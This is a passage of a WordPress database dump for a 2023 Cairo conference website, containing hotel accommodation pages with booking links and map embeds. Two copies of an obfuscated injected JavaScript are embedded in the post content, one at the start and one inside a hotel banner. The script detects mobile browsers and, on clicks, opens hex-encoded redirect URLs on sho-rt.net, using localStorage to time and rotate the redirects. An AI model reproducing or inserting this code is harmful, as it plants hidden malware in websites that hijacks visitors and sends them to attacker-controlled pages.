_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-08-15 16:49:04','2023-08-15 16:49:04','',2685,'https://gsw2023.com/?p=5202',0,'revision','',0),
(5203,1,'2023-08-15 16:50:32','2023-08-15 16:50:32','[vc_row][vc_column][dt_banner image_id=\"2683\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]\r\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">INTERCONTINENTAL CAIRO SEMIRAMIS</span></h2>\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">https://www.ihg.com/intercontinental/hotels</a></span></span></h6>\r\n</li>\r\n</ul>\r\n<h6><span style=\"font-family: Arial, Helvetica, sans-serif;\"><span style=\"font-size: 8pt;\"><a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic\">/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_ic</a></span></span></h6>\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d6907.530703931726!2d31.232628000000002!3d30.043589!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x0%3A0xaf4aee1a5598653d!2sInterContinental%20Cairo%20Semiramis%2C%20an%20IHG%20Hotel!5e0!3m2!1sen!2seg!4v1674631098317!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"></iframe>\r\n<h4><span style=\"color: #ffffff;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 14pt;\"><a style=\"color: #ffff00;\" href=\"https://www.ihg.com/redirect?path=asearch&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;checkInDate=01&amp;checkInMonthYear=082023&amp;checkOutDate=08&amp;checkOutMonthYear=082023&amp;rateCode=AAFST&amp;_PMID=99801505&amp;GPC=ARA&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">BOOK NOW</a></span></h5>\r\n[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h1 style=\"text-align: center;\"><a>Other </a><a>Hotel Accommodation</a></h1>\r\n<p style=\"text-align: center;\"><a> Nearby the Conference Venue</a></p>\r\n[/vc_column_text][dt_banner image_id=\"5033\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]\r\n<h1 style=\"text-align: center;\"><span style=\"font-size: 36pt; color: #ffffff;\">Ramses Hilton hotel</span></h1>\r\n<h4></h4>\r\n<ul>\r\n 	<li><strong><span style=\"color: #0000ff; font-size: 12pt;\"><a style=\"color: #0000ff;\" href=\"https://www.guestreservations.com/ramses-hilton/booking?msclkid=5045658d464f1148cfd9013a670fd9bc\">Ramses Hilton Hotel &amp; Casino</a></span></strong></li>\r\n</ul>\r\n&nbsp;\r\n\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.5319929288576!2d31.22717948709823!3d30.050281810255406!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c381a29537%3A0xf1d5b3a64a0e4de1!2sRamses%20Hilton!5e0!3m2!1sen!2ssa!4v1689723107695!5m2!1sen!2ssa\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong>Deadline for the Special Rates is August 10, 2023</strong></span></h5>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.hilton.com/en/attend-my-event/cairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0/\" target=\"_blank\" rel=\"noopener\"><span style=\"color: #ffff00; font-size: 14pt;\"><strong>BOOK NOW</strong></span></a></p>\r\n[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4726\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]\r\n<h2 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"font-size: 24pt; color: #ffff00;\">Flamenco Cairo Hotel</span></h2>\r\n<h4><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"https://www.flamencohotels.com/web/?page_id=5462\">Start – Flamenco (flamencohotels.com)</a></strong></span></h4>\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m16!1m12!1m3!1d27631.27179417239!2d31.19188108296991!3d30.039469195243615!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!2m1!1sFlamenco%20Cairo%20Hotel!5e0!3m2!1sen!2ssa!4v1689724196436!5m2!1sen!2ssa\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n<h4><span style=\"color: #3366ff;\">Deadline for the Special Rates is August 10, 2023</span></h4>\r\n&nbsp;\r\n<h2 style=\"text-align: center;\"><span style=\"color: #3366ff;\"><strong><a style=\"color: #3366ff;\" href=\"https://gsw2023.com/index.php/flamenco-cairo-hotel/\"><span style=\"font-size: 18pt;\">BOOK NOW </span> </a></strong></span></h2>\r\n[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"2688\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]\r\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Steigenberger Hotel El Tahrir</span></h2>\r\n<span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></strong></span>\r\n<p style=\"text-align: left;\"><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\r\n\r\n<h4><span style=\"color: #3366ff;\">Deadline for the Special Rates is August 10, 2023</span></h4>\r\n<h2 style=\"text-align: center;\"><span style=\"color: #3366ff; font-size: 14pt;\"><strong><a style=\"color: #3366ff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\"><span style=\"font-size: 24pt;\">BOOK NOW </span> </a></strong></span></h2>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 14pt;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">Steigenberger Hotel El Tahrir – GSW2023</a></strong></span></h4>\r\n[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4788\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]\r\n<h2 class=\"vc_custom_heading\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Grand Nile Tower Hotel</span></h2>\r\n<ul>\r\n 	<li><span style=\"color: #ffffff;\"><a style=\"color: #ffffff;\" href=\"https://www.grandniletower.com/\">https://www.grandniletower.com/</a></span></li>\r\n</ul>\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3454.091887744032!2d31.22467591511475!3d30.03422158188607!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x14584090695d6421%3A0x201285387107863a!2sGrand%20Nile%20Tower!5e0!3m2!1sen!2ssa!4v1689721277379!5m2!1sen!2ssa\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n<h4><span style=\"color: #3366ff;\">Deadline for the Special Rates is August 10, 2023</span></h4>\r\n<h1 style=\"text-align: center;\"><span style=\"color: #3366ff; font-size: 24pt;\"><strong><a style=\"color: #3366ff;\" href=\"https://gsw2023.com/index.php/grand-nile-tower-hotel/\">BOOK NOW</a></strong></span></h1>\r\n[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4730\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]\r\n<h2 class=\"vc_custom_heading\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Novotel Cairo El Borg</span></h2>\r\n<ul>\r\n 	<li><span style=\"color: #ffffff; font-size: 12pt;\"><strong><a style=\"color: #ffffff;\" href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></strong></span></li>\r\n</ul>\r\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe>\r\n<ul>\r\n 	<li>\r\n<h4><span style=\"color: #ffffff;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 15, 2023</span></h5>\r\n</li>\r\n</ul>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/novotel-cairo-el-borg/\"><span style=\"color: #ffff00;\">BOOK NOW </span> </a></strong></span></h4>\r\n[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"2689\" bg_color=\"rgba(255,255,255,0.01)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]\r\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Kempinski Nile Hotel Garden City Cairo</span></h2>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return 